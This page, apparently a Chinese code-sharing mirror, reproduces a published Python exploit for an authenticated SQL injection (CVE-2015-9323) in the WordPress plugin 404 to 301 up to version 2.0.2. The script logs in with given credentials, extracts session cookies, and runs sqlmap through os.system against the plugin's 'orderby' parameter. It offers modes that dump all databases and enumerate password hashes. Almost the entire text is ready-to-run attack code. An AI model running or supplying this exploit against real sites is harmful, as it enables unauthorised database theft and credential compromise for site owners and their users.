扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 |
# Exploit Title: WordPress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated) # Date 30.01.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/ # Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip # Version: <= 2.0.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2015-9323 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md ''' Description: The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection. ''' banner = ''' .o88b. dbdb d88888b.d888b..d88b. db ooooo.d888b. d8888b. .d888b. d8888b. d8PY8 8888 88'VP<code>8D .8P88. o888P~~~~88' </code>8D VP<code>8D VP</code>8D VP<code>8D 8PY88P 88ooooo odD' 88d'8888 dP </code>V8o88' oooY'odD' oooY' 8b<code>8bd8' 88~~~~~ C8888D.88' 88 d' 8888 V8888b. C8888Dd8'~~~b..88' ~~~b. Y8bd8</code>8bd8'88.j88.<code>88d8'88 </code>8Dd8' db 8D j88.db 8D Y88P'YPY88888P888888D</code>Y88P' VP 88oobY' d8'Y8888P' 888888D Y8888P' [+] 404 to 301 - SQL-Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse import os import requests from datetime import datetime import json # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # SQL-Injection (Exploit): # Generate payload for sqlmap print ('[+] Payload for sqlmap exploitation:') cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') cookie = cookie.replace(',', '; ') exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"' exploit_risk = ' --level 2 --risk 2' exploit_cookie = r' --cookie="' + cookie + r'" ' print('Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --bannerRetrieve DBMS banner') print(' --current-userRetrieve DBMS current user') print(' --current-dbRetrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tablesEnumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schemaEnumerate DBMS schema') print(' --dumpDump DBMS database table entries') print(' --dump-allDump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0' os.system(exploit_code) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) |
体验盒子
